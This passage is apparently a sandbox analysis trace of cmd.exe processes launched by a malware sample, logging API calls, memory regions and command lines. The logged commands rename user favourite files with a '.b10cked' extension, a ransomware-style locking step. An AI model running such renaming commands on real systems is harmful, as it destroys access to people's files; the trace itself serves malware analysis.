SetErrorMode (uMode=0x0) returned 0x0 [0214.333] SetErrorMode (uMode=0x1) returned 0x0 [0214.333] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", nBufferLength=0x104, lpBuffer=0x2cf268, lpFilePart=0x2cedf8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", lpFilePart=0x2cedf8*="Microsoft Store.url.b10cked") returned 0x3e [0214.333] SetErrorMode (uMode=0x0) returned 0x1 [0214.333] SetLastError (dwErrCode=0x0) [0214.333] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url.b10cked")) returned 0xffffffff [0214.334] GetLastError () returned 0x2 [0214.334] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", fInfoLevelId=0x1, lpFindFileData=0x2ce774, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce774) returned 0x4b0ed8 [0214.334] FindNextFileW (in: hFindFile=0x4b0ed8, lpFindFileData=0x2ce774 | out: lpFindFileData=0x2ce774) returned 0 [0214.334] GetLastError () returned 0x12 [0214.334] FindClose (in: hFindFile=0x4b0ed8 | out: hFindFile=0x4b0ed8) returned 1 [0214.335] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", fInfoLevelId=0x1, lpFindFileData=0x4c1c28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1c28) returned 0x4b0ed8 [0214.335] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", nBufferLength=0x104, lpBuffer=0x2cea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", lpFilePart=0x0) returned 0x3e [0214.335] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url", nBufferLength=0x104, lpBuffer=0x2cea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url", lpFilePart=0x0) returned 0x36 [0214.335] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url")) returned 0x20 [0214.335] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url.b10cked"), dwFlags=0x3) returned 1 [0214.336] FindClose (in: hFindFile=0x4b0ed8 | out: hFindFile=0x4b0ed8) returned 1 [0214.336] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ce9c0 | out: _Buffer=" 1") returned 9 [0214.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.336] GetFileType (hFile=0x7) returned 0x2 [0214.336] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.336] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ce94c | out: lpMode=0x2ce94c) returned 1 [0214.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce980 | out: lpConsoleScreenBufferInfo=0x2ce980) returned 1 [0214.337] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.337] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce9c0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.337] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ce9a4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce9a4*=0x1a) returned 1 [0214.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.337] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.338] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.338] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.338] SetConsoleInputExeNameW () returned 0x1 [0214.338] GetConsoleOutputCP () returned 0x1b5 [0214.338] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.338] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.338] exit (_Code=0) Process: id = "528" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31429 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31430 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31431 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31432 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 31433 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31434 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31435 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31436 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31437 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 31438 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31507 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31508 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31509 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31510 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 31511 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 31512 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31513 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31514 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31515 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31516 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31517 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31518 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31519 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31520 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31521 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 31522 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31523 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31524 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 31525 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 31526 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 31527 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 31528 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 31529 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 31530 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 729 os_tid = 0xa94 [0213.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af82c | out: lpSystemTimeAsFileTime=0x1af82c*(dwLowDateTime=0xb439da40, dwHighDateTime=0x1d440a9)) [0213.772] GetCurrentProcessId () returned 0x9b0 [0213.772] GetCurrentThreadId () returned 0xa94 [0213.772] GetTickCount () returned 0x3be5e [0213.772] QueryPerformanceCounter (in: lpPerformanceCount=0x1af824 | out: lpPerformanceCount=0x1af824*=27056140941) returned 1 [0213.773] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.773] __set_app_type (_Type=0x1) [0213.773] __p__fmode () returned 0x76b331f4 [0213.773] __p__commode () returned 0x76b331fc [0213.773] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.773] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.773] GetCurrentThreadId () returned 0xa94 [0213.774] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0213.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.774] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.774] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.774] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.774] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7bc | out: phkResult=0x1af7bc*=0x0) returned 0x2 [0213.774] VirtualQuery (in: lpAddress=0x1af7f3, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.774] GetConsoleOutputCP () returned 0x1b5 [0213.775] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.775] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.775] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.775] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.775] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.775] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.775] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.776] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.776] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.776] GetEnvironmentStringsW () returned 0x320198* [0213.776] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0213.776] GetEnvironmentStringsW () returned 0x320198* [0213.776] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0213.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae72c | out: phkResult=0x1ae72c*=0x40) returned 0x0 [0213.776] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0xc0, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x0, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegCloseKey (hKey=0x40) returned 0x0 [0213.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae72c | out: phkResult=0x1ae72c*=0x40) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x40, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x1, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x0, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x9, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x4, lpData=0x1ae738*=0x9, lpcbData=0x1ae730*=0x4) returned 0x0 [0213.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae734, lpData=0x1ae738, lpcbData=0x1ae730*=0x1000 | out: lpType=0x1ae734*=0x0, lpData=0x1ae738*=0x9, lpcbData=0x1ae730*=0x1000) returned 0x2 [0213.777] RegCloseKey (hKey=0x40) returned 0x0 [0213.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.777] srand (_Seed=0x5b8863af) [0213.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"" [0213.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"" [0213.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.778] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.778] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.778] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.778] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.778] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.778] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.778] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.778] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.778] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.778] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.779] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.779] GetEnvironmentStringsW () returned 0x3222e8* [0213.779] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0213.779] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.779] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.779] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.779] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.779] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.779] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.779] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.779] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.779] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.779] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af4f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af4f8, lpFilePart=0x1af4f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af4f4*="Desktop") returned 0x18 [0213.779] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.779] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af274 | out: lpFindFileData=0x1af274) returned 0x320028 [0213.780] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0213.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af274 | out: lpFindFileData=0x1af274) returned 0x320028 [0213.780] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0213.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af274 | out: lpFindFileData=0x1af274) returned 0x320028 [0213.780] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0213.780] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.780] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.780] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.780] GetEnvironmentStringsW () returned 0x322b08* [0213.781] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0213.781] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.781] GetConsoleOutputCP () returned 0x1b5 [0213.781] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.781] GetUserDefaultLCID () returned 0x409 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af638, cchData=128 | out: lpLCData="0") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af638, cchData=128 | out: lpLCData="0") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af638, cchData=128 | out: lpLCData="1") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: 